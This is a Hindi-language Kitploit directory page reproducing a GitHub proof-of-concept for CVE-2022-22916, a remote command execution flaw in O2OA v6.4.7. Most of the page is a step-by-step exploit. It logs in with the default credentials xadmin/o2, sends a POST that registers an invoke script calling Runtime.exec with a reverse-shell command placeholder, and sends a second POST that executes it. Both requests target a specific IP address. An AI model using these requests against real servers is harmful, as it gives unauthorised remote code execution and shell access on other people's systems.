Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22916 — CVE-2022-22916,O2OA RCE दूरस्थ कमांड निष्पादन | Kitploit
उपकरण/GitHubGitHub/0x7eteam/cve-2022-22916
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub0x7eteam/cve-2022-22916

CVE-2022-22916

CVE-2022-22916,O2OA RCE दूरस्थ कमांड निष्पादन

रिपॉजिटरी देखें
454 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22916

CVE-2022-22916, O2OA RCE दूरस्थ कमांड निष्पादन

O2OA RCE दूरस्थ कमांड निष्पादन (CVE-2022-22916)

O2OA J2EE वितरित आर्किटेक्चर पर आधारित, मोबाइल ऑफिस और स्मार्ट ऑफिस को एकीकृत करने वाला, निजीकृत तैनाती का समर्थन करने वाला, अनुकूली लोड क्षमता वाला, और AGPL लाइसेंस के तहत ओपन-सोर्स एंटरप्राइज सूचना प्रणाली अनुकूलन विकास प्लेटफॉर्म समाधान है, जो सॉफ्टवेयर विकास लागत को काफी हद तक बचाता है। /x_program_center/jaxrs/invoke के माध्यम से, O2OA v6.4.7 में एक दूरस्थ कोड निष्पादन (RCE) दोष पाया गया है।

पहला कदम:

खाता xadmin/o2 में लॉग इन करें Authorization प्राप्त करें

दूसरा कदम: इंटरफ़ेस जोड़ें

root@kitploit:~
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 123.58.236.76:33455
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 你的Authorization
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475

{"name":"aodsec","id":"aodsec","alias":"","description":"","isNewInvoke":true,"text":"\nvar p = java.lang.Runtime.getRuntime().exec('反弹shell命令');\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}

दूसरा कदम: कमांड निष्पादित करें

root@kitploit:~
POST /x_program_center/jaxrs/invoke/aodsec/execute?v=6.3 HTTP/1.1
Host: 123.58.236.76:43953
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: 你的Authorization
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://123.58.236.76:43953
Referer: http://123.58.236.76:43953/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie:  
Connection: close
टूल डाउनलोड करें